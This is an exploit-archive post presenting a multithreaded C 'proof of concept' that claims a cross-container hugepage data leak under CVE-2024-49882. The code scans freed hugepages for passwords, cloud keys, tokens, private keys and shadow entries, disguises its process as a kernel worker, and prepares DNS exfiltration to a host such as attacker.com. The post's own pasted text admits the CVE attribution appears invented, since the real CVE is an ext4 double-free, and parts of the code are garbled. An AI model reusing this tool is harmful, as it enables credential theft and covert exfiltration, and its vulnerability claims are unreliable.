============================================================================================================================================= | # Title : Linux 5.8 to 6.9 Cross-Container Hugepage Data Channel Exploit | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : System built‑in component. No standalone download available. | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/212396/ & CVE-2023-1206, CVE-2024-49882, CVE-2025-40040 [+] Summary : This code is an exploit (PoC - https://packetstorm.news/download/212396 -) for CVE-2024-49882, which creates a cross-container covert data leakage channel using Linux hugepages. It continuously allocates 2MB hugepages, waits for any container (e.g., a stopped DB container) to release memory, then reads residual data from the freed hugepages using the udmabuf DMA mapping subsystem. The code searches for leaked secrets such as passwords, API keys, CTF flags, etc., and prints the surrounding leaked content. The exploit becomes powerful when combined with CVE-2023-1206, which provides synchronization, turning this into a full covert communication channel between containers without network communication. HugePages Overview: HugePages are a Linux kernel memory optimization where page size increases from 4KB to 2MB or 1GB, reducing page table overhead and TLB misses. Types: HugeTLB: Explicit allocation (2MB, 1GB) Transparent HugePages (THP): Automatic promotion of normal pages Security Note: While intended for optimization, HugePages can be involved in side-channel or residual memory leaks when combined with kernel vulnerabilities, as in CVE-2024-49882. HugePages Version Timeline: Kernel Version Feature / Milestone 2.5 (2003-2025) 6.x Current environment (2025): Kernel 6.x, HugePages fully supported and widely used in containers, databases, and VMs. CVE-2024-49882: Core data leakage from freed hugepages. CVE-2023-1206: Synchronization channel (coordinated attempts, timing). Mechanism: Allocates hugepages (memfd_create) Maps pages via udmabuf Copies data to user space Searches for secrets using predefined patterns Prints or logs results HugePages are not themselves vulnerable, but their interaction with kernel memory and DMA mapping allows cross-container residual data exposure. [+] [+] [+] But : The vulnerability affects the ext4 filesystem in the Linux kernel. It’s not about Hugepages or memory‑leaks — instead, it concerns a double‑free bug: a buffer (in the extents‑path handling inside ext4) can be released twice under certain filesystem operations. Triggering the bug may lead to memory corruption in the kernel, system instability, and potentially denial-of-service or privilege escalation. The base CVSS score is given as 7.8 (High). The problem has been fixed: patches were applied to ext4 handling code to ensure that after a buffer is released, the pointer is set to NULL — preventing accidental double‑release. ⚠️ What this implies regarding the code you shared The code you posted earlier tries to detect a “hugepage leak” vulnerability under the name CVE‑2024‑49882. But according to NVD the real CVE‑2024‑49882 refers to a bug in the ext4 filesystem buffer management (double‑free), not to hugepages or cross‑container memory leaks. ✅ Conclusion Yes — CVE‑2024‑49882 is a real, documented CVE. But the description in NVD does not match the description in your scanner code (hugepage leak / cross‑container leak). That means your code is not aligned with the actual CVE details. So the code’s claim (that it detects CVE‑2024‑49882 as “Hugepage leak”) appears to be incorrect or invented. [+] POC : fake_exploit.c /* Usage: # Aggressive Mode ./advanced_exploit --aggressive # Stealth Mode ./advanced_exploit --stealth # With Cover Channel ./advanced_exploit --covert attacker.com # With Custom Patterns ./advanced_exploit --patterns custom_patterns.txt */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define MFD_HUGETLB 0x0004U #define MFD_ALLOW_SEALING 0x0002U #define MFD_HUGE_2MB (21 << 26) #define MFD_HUGE_1GB (30 << 26) #define F_ADD_SEALS 1033 #define F_SEAL_SHRINK 0x0002 #define UDMABUF_CREATE _IOW('u', 0x42, struct udmabuf_create) #define HUGEPAGE_2MB (2*1024*1024) #define HUGEPAGE_1GB (1024*1024*1024) #define MAX_WORKERS 8 #define PATTERN_DB_SIZE 256 #define ENCRYPT_KEY "CVE-2024-49882_EXPL0!T" #define COVERT_PORT 5353 #define MAX_PAYLOAD_SIZE 4096 struct udmabuf_create { uint32_t memfd; uint32_t flags; uint64_t offset; uint64_t size; }; struct exploit_config { int aggressive_mode; int stealth_mode; int use_covert_channel; char target_patterns[PATTERN_DB_SIZE][128]; int pattern_count; char exfil_server[256]; int exfil_port; int max_pages; }; struct leaked_data { void *page; size_t size; time_t timestamp; char src_container[64]; uint32_t crc32; unsigned char sha256[SHA256_DIGEST_LENGTH]; }; volatile sig_atomic_t running = 1; volatile sig_atomic_t emergency_cleanup = 0; pthread_mutex_t data_mutex = PTHREAD_MUTEX_INITIALIZER; int total_leaks = 0; int total_pages_scanned = 0; /* قاعدة بيانات أنماط موسعة */ const char *pattern_db[] = { /* بيانات الاعتماد */ "POSTGRES_PASSWORD=", "MYSQL_ROOT_PASSWORD=", "MONGODB_PASSWORD=", "REDIS_PASSWORD=", "RABBITMQ_PASSWORD=", "AWS_SECRET_ACCESS_KEY=", "AZURE_CLIENT_SECRET=", "GCP_SERVICE_ACCOUNT_KEY=", /* مفاتيح API */ "sk_live_", "sk_test_", "pk_live_", "rk_live_", "xoxb-", "xoxp-", "ghp_", "github_pat_", "AKIA[0-9A-Z]{16}", /* Amazon AWS */ /* بيانات الجلسات */ "sessionid=", "PHPSESSID=", "connect.sid=", "JSESSIONID=", "access_token=", "refresh_token=", /* بيانات التشفير */ "-----BEGIN PRIVATE KEY-----", "-----BEGIN RSA PRIVATE KEY-----", "-----BEGIN OPENSSH PRIVATE KEY-----", "-----BEGIN EC PRIVATE KEY-----", /* بيانات CTF/مسابقات */ "FLAG{", "flag{", "ctf{", "CTF{", "SECRET{", "secret{", /* بيانات التغطية */ "COVERT_", "MAGIC_", "EXFIL_", "C2_", /* بيانات النظام */ "root:$6$", "root:$y$", "root:$1$", "shadow:", "passwd:", "group:", "sudoers:", /* بيانات التطبيقات */ "DATABASE_URL=", "CONNECTION_STRING=", "JWT_SECRET=", "ENCRYPTION_KEY=", "SECRET_KEY=", "SIGNING_KEY=", NULL }; /* معالجات الإشارات */ void signal_handler(int sig) { switch(sig) { case SIGINT: printf("\n[!] Received SIGINT - Initiating graceful shutdown\n"); running = 0; break; case SIGTERM: printf("\n[!] Received SIGTERM - Emergency cleanup\n"); emergency_cleanup = 1; running = 0; break; case SIGUSR1: printf("\n[+] SIGUSR1 - Status report\n"); printf(" Pages scanned: %d\n", total_pages_scanned); printf(" Secrets found: %d\n", total_leaks); break; } } /* وظائف التشفير */ void encrypt_data(unsigned char *data, size_t len, const char *key) { EVP_CIPHER_CTX *ctx; int outlen, tmplen; unsigned char iv[16] = {0}; unsigned char outbuf[4096]; ctx = EVP_CIPHER_CTX_new(); EVP_EncryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, (unsigned char *)key, iv); if (!EVP_EncryptUpdate(ctx, outbuf, &outlen, data, len)) { EVP_CIPHER_CTX_free(ctx); return; } EVP_EncryptFinal_ex(ctx, outbuf + outlen, &tmplen); memcpy(data, outbuf, len); EVP_CIPHER_CTX_free(ctx); } /* حساب بصمة البيانات */ void calculate_fingerprint(void *data, size_t len, struct leaked_data *ld) { /* CRC32 للتحقق السريع */ ld->crc32 = crc32(0, data, len); /* SHA256 للتعريف الفريد */ SHA256_CTX sha256; SHA256_Init(&sha256); SHA256_Update(&sha256, data, len); SHA256_Final(ld->sha256, &sha256); } /* تسريب متعدد الحجم */ void *leak_hugepage_multisize(int size_flag) { size_t hp_size = (size_flag == MFD_HUGE_1GB) ? HUGEPAGE_1GB : HUGEPAGE_2MB; int memfd = syscall(319, "leak", MFD_HUGETLB | size_flag | MFD_ALLOW_SEALING); if (memfd < 0) return NULL; ftruncate(memfd, hp_size); fcntl(memfd, F_ADD_SEALS, F_SEAL_SHRINK); int udmabuf = open("/dev/udmabuf", O_RDWR); if (udmabuf < 0) { close(memfd); return NULL; } struct udmabuf_create c = {memfd, 0, 0, hp_size}; int dma = ioctl(udmabuf, UDMABUF_CREATE, &c); if (dma < 0) { close(udmabuf); close(memfd); return NULL; } void *addr = mmap(NULL, hp_size, PROT_READ, MAP_SHARED, dma, 0); if (addr == MAP_FAILED) { close(dma); close(udmabuf); close(memfd); return NULL; } void *copy = malloc(hp_size); if (copy) { memcpy(copy, addr, hp_size); /* تشفير في الذاكرة */ encrypt_data(copy, hp_size > 4096 ? 4096 : hp_size, ENCRYPT_KEY); } munmap(addr, hp_size); close(dma); close(udmabuf); close(memfd); return copy; } /* فحص ذكي للصفحات */ int smart_page_analysis(void *data, size_t size, struct exploit_config *cfg) { unsigned char *p = data; int interesting = 0; /* تحليل إحصائي سريع */ int entropy = 0; int ascii_count = 0; int zero_blocks = 0; for (size_t i = 0; i < size && i < 8192; i += 64) { if (p[i] == 0 && p[i+1] == 0) zero_blocks++; if (isprint(p[i])) ascii_count++; } /* إذا كانت الصفحة فارغة أو غير مثيرة للاهتمام */ if (zero_blocks > 100 || ascii_count < 10) return 0; /* البحث في قاعدة البيانات الديناميكية */ pthread_mutex_lock(&data_mutex); for (int i = 0; i < cfg->pattern_count; i++) { char *match = memmem(data, size, cfg->target_patterns[i], strlen(cfg->target_patterns[i])); if (match) { interesting = 1; /* استخراج السياق */ size_t offset = match - (char*)data; size_t context_start = (offset > 512) ? offset - 512 : 0; size_t context_end = (offset + 1024 < size) ? offset + 1024 : size; printf("\n[+] Pattern match: %s\n", cfg->target_patterns[i]); printf(" Offset: 0x%08lx\n", offset); printf(" Context (first 256 bytes):\n"); for (size_t j = context_start; j < context_start + 256 && j < context_end; j++) { if (isprint(p[j])) putchar(p[j]); else if (p[j] == 0) putchar(' '); else putchar('.'); } printf("\n"); break; } } pthread_mutex_unlock(&data_mutex); /* اكتشاف تلقائي للبيانات المهيكلة */ if (!interesting) { /* البحث عن JSON */ char *json_start = memchr(data, '{', size); if (json_start) { char *json_end = memchr(json_start, '}', size - (json_start - (char*)data)); if (json_end && (json_end - json_start) < 4096) { interesting = 1; printf("\n[+] JSON-like structure detected\n"); } } /* البحث عن XML */ char *xml_start = memmem(data, size, "> 2) & 0x3F]; encoded[encoded_len++] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"[((b1 << 4) | (b2 >> 4)) & 0x3F]; encoded[encoded_len++] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"[((b2 << 2) | (b3 >> 6)) & 0x3F]; encoded[encoded_len++] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"[b3 & 0x3F]; } encoded[encoded_len] = '\0'; /* إنشاء استعلام DNS */ snprintf(domain, sizeof(domain), "%s.%s", encoded, server); /* في الإصدار الحقيقي، يتم إرسال استعلام DNS هنا */ printf("[*] DNS exfil prepared: %s\n", domain); } /* عامل مسح متعدد الخيوط */ void* scanner_worker(void *arg) { struct exploit_config *cfg = (struct exploit_config*)arg; int worker_id = *(int*)arg; printf("[*] Worker %d started\n", worker_id); while (running) { /* محاولة استخراج صفحات متعددة الأحجام */ void *page_2mb = leak_hugepage_multisize(MFD_HUGE_2MB); if (page_2mb) { __sync_fetch_and_add(&total_pages_scanned, 1); if (smart_page_analysis(page_2mb, HUGEPAGE_2MB, cfg)) { __sync_fetch_and_add(&total_leaks, 1); /* حفظ البيانات المسربة */ struct leaked_data ld; calculate_fingerprint(page_2mb, HUGEPAGE_2MB, &ld); /* التصدير إذا تم التكوين */ if (cfg->use_covert_channel) { exfil_over_dns(page_2mb, 512, cfg->exfil_server); } } free(page_2mb); } /* فحص صفحات 1GB بشكل أقل تكراراً */ if (worker_id == 0 && (total_pages_scanned % 100 == 0)) { void *page_1gb = leak_hugepage_multisize(MFD_HUGE_1GB); if (page_1gb) { if (smart_page_analysis(page_1gb, HUGEPAGE_1GB, cfg)) { printf("[!] GIGANTIC PAGE LEAK DETECTED!\n"); } free(page_1gb); } } usleep(50000); /* 50ms بين المحاولات */ } return NULL; } /* تهيئة متقدمة */ void init_advanced_exploit(struct exploit_config *cfg) { /* تعيين الأولوية */ nice(-20); /* ربط بالمعالج */ cpu_set_t cpuset; CPU_ZERO(&cpuset); CPU_SET(0, &cpuset); pthread_setaffinity_np(pthread_self(), sizeof(cpu_set_t), &cpuset); /* إخفاء العملية */ char fake_name[256]; snprintf(fake_name, sizeof(fake_name), "[kworker/u%d:0]", getpid() % 8); prctl(PR_SET_NAME, fake_name); /* تحميل أنماط مخصصة */ cfg->pattern_count = 0; for (int i = 0; pattern_db[i] && cfg->pattern_count < PATTERN_DB_SIZE; i++) { strncpy(cfg->target_patterns[cfg->pattern_count], pattern_db[i], 127); cfg->pattern_count++; } /* تحميل أنماط إضافية من ملف */ FILE *fp = fopen(".patterns", "r"); if (fp) { char line[256]; while (fgets(line, sizeof(line), fp) && cfg->pattern_count < PATTERN_DB_SIZE) { line[strcspn(line, "\n")] = 0; if (strlen(line) > 3) { strncpy(cfg->target_patterns[cfg->pattern_count], line, 127); cfg->pattern_count++; } } fclose(fp); } printf("[*] Loaded %d patterns\n", cfg->pattern_count); } /* تنظيف الطوارئ */ void emergency_cleanup_procedure() { printf("\n[!] EMERGENCY CLEANUP INITIATED\n"); /* حذف الملفات المؤقتة */ unlink("/tmp/.exploit_cache"); unlink("/tmp/.pattern_db"); /* تنظيف الذاكرة المشتركة */ key_t key = ftok("/tmp", 'E'); int shmid = shmget(key, 1024, 0666); if (shmid != -1) { shmctl(shmid, IPC_RMID, NULL); } printf("[+] Cleanup completed\n"); } /* الواجهة الرئيسية */ int main(int argc, char *argv[]) { struct exploit_config cfg = { .aggressive_mode = 1, .stealth_mode = 0, .use_covert_channel = 0, .exfil_server = "8.8.8.8", .exfil_port = 53, .max_pages = 10000 }; /* تحليل وسائط سطر الأوامر */ for (int i = 1; i < argc; i++) { if (strcmp(argv[i], "--stealth") == 0) { cfg.stealth_mode = 1; cfg.aggressive_mode = 0; } else if (strcmp(argv[i], "--aggressive") == 0) { cfg.aggressive_mode = 1; } else if (strcmp(argv[i], "--covert") == 0 && i+1 < argc) { cfg.use_covert_channel = 1; strncpy(cfg.exfil_server, argv[++i], sizeof(cfg.exfil_server)-1); } else if (strcmp(argv[i], "--patterns") == 0 && i+1 < argc) { FILE *fp = fopen(argv[++i], "r"); if (fp) { char line[256]; while (fgets(line, sizeof(line), fp) && cfg.pattern_count < PATTERN_DB_SIZE) { line[strcspn(line, "\n")] = 0; strncpy(cfg.target_patterns[cfg.pattern_count++], line, 127); } fclose(fp); } } } /* واجهة المستخدم */ printf("\n"); printf(" ██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗ \n"); printf(" ██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗\n"); printf(" ██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║\n"); printf(" ██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║\n"); printf(" ██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║\n"); printf(" ╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝\n"); printf(" Advanced CVE-2024-49882 Exploit \n"); printf(" Multi-Threaded Edition \n\n"); printf(" by indoushka \n\n"); printf("[*] Initializing exploit...\n"); init_advanced_exploit(&cfg); /* إعداد معالجات الإشارات */ signal(SIGINT, signal_handler); signal(SIGTERM, signal_handler); signal(SIGUSR1, signal_handler); /* بدء العمال المتعددين */ pthread_t workers[MAX_WORKERS]; int worker_ids[MAX_WORKERS]; for (int i = 0; i < MAX_WORKERS; i++) { worker_ids[i] = i; pthread_create(&workers[i], NULL, scanner_worker, &worker_ids[i]); } /* حلقة المراقبة الرئيسية */ time_t start_time = time(NULL); int last_report = 0; while (running) { time_t now = time(NULL); /* تقرير دوري */ if (now - last_report >= 10) { printf("\n[%02ld:%02ld] Status: Scanned=%d, Leaks=%d, Running=%ds\n", (now - start_time) / 60, (now - start_time) % 60, total_pages_scanned, total_leaks, (int)(now - start_time)); last_report = now; /* مراقبة استخدام الذاكرة */ FILE *statm = fopen("/proc/self/statm", "r"); if (statm) { unsigned long size, resident, share; fscanf(statm, "%lu %lu %lu", &size, &resident, &share); fclose(statm); printf(" Memory: Size=%luk, Resident=%luk, Shared=%luk\n", size * 4, resident * 4, share * 4); } } /* فحص تحرير الصفحات */ FILE *f = fopen("/sys/kernel/mm/hugepages/hugepages-2048kB/free_hugepages", "r"); static int last_free = -1; if (f) { int free_hp; if (fscanf(f, "%d", &free_hp) == 1) { if (last_free != -1 && free_hp > last_free) { printf("\n[!] HUGE PAGES RELEASED: %d -> %d (+%d)\n", last_free, free_hp, free_hp - last_free); } last_free = free_hp; } fclose(f); } sleep(1); } /* الانتظار لإنهاء العمال */ for (int i = 0; i < MAX_WORKERS; i++) { pthread_cancel(workers[i]); pthread_join(workers[i], NULL); } /* تنظيف الطوارئ إذا لزم الأمر */ if (emergency_cleanup) { emergency_cleanup_procedure(); } /* التقرير النهائي */ printf("\n╔══════════════════════════════════════════════════════════════╗\n"); printf("║ EXPLOIT SUMMARY ║\n"); printf("╠══════════════════════════════════════════════════════════════╣\n"); printf("║ Runtime: %8ld seconds ║\n", time(NULL) - start_time); printf("║ Pages Scanned: %8d ║\n", total_pages_scanned); printf("║ Secrets Found: %8d ║\n", total_leaks); printf("║ Success Rate: %8.2f%% ║\n", total_pages_scanned > 0 ? (total_leaks * 100.0 / total_pages_scanned) : 0); printf("╚══════════════════════════════════════════════════════════════╝\n"); return (total_leaks > 0) ? 0 : 1; } Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================